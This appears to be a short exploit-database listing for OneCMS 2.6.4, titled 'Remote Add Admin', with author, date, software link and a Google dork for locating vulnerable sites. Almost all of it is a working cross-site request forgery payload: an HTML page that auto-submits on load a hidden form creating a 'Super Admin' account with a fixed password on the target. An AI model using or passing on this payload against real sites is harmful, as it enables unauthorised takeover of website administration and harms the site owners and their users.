facebook facebook twitter rss

OneCMS 2.6.4 Remote Add Admin

Author: DaOne , Published: 21-09-2012
##########################################
[~] Exploit Title: OneCMS 2.6.4 Remote Add Admin
[~] Author: DaOne
[~] Date: 27-7-2012
[~] Category: webapps
[~] Software Link: http://www.onecms.net/page_downloads.html
[~] Google dork: intext:"Powered by OneCMS"
[~] Greetz to [L1byanCyb3rArmy]
##########################################

[#] ~[ Exploit ]~

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/admin/users.php?load=users&view=add2">
<input type="hidden" name="name" value="webadmin"/>
<input type="hidden" name="password1" value="123456"/>
<input type="hidden" name="email" value="admin@admin.com"/>
<input type="hidden" name="level" value="Super Admin"/>
</form>
</body>
</html>

##########################################

Like us on Facebook :